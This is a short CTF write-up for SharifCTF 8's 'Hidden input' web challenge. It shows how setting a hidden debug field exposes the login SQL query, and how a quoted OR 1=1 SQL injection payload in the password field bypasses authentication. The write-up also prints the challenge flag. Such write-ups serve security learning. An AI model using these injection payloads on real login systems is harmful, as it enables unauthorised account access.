Information#
Version#
| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |
CTF#
- Name : SharifCTF 8
- Website : ctf.certcc.ir
- Type : Online
- Format : Jeopardy
- CTF Time : link
50 - Hidden input - Web#
Login if you can :)
There is an hidden input:
<form method="POST" action="login.php">
<div class="login-block">
<h1>Login</h1>
<input type="text" value="" placeholder="Username" id="Username" name="Username"/>
<input type="password" value="" placeholder="Password" id="Password" name="Password"/>
<input type="hidden" name="debug" id="debug" value="0">
<button>Login</button>
</div>
</form>And change the debug POST value to get: Username=admin&Password=pass&debug=1.
This is showing us the SQL query used.
username: admin
password: pass
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('pass')First I think this payload should work but it didn't.
Username=admin%27%29--+-&Password=sdf&debug=0
username: admin')-- -
password: sdf
SQL query: SELECT * FROM users WHERE username=('admin')-- -') AND password=('sdf')Comment doesn't seem to work so let's generate a fully working querry:
Username=admin&Password=%27%29+OR+1%3D1+OR+999+%3E+ORD%28%27a&debug=1
username: admin
password: ') OR 1=1 OR 999 > ORD('a
SQL query: SELECT * FROM users WHERE username=('admin') AND password=('') OR 1=1 OR 999 > ORD('a')Your flag is: SharifCTF{c58a108967c46222bbdc743e15932c26}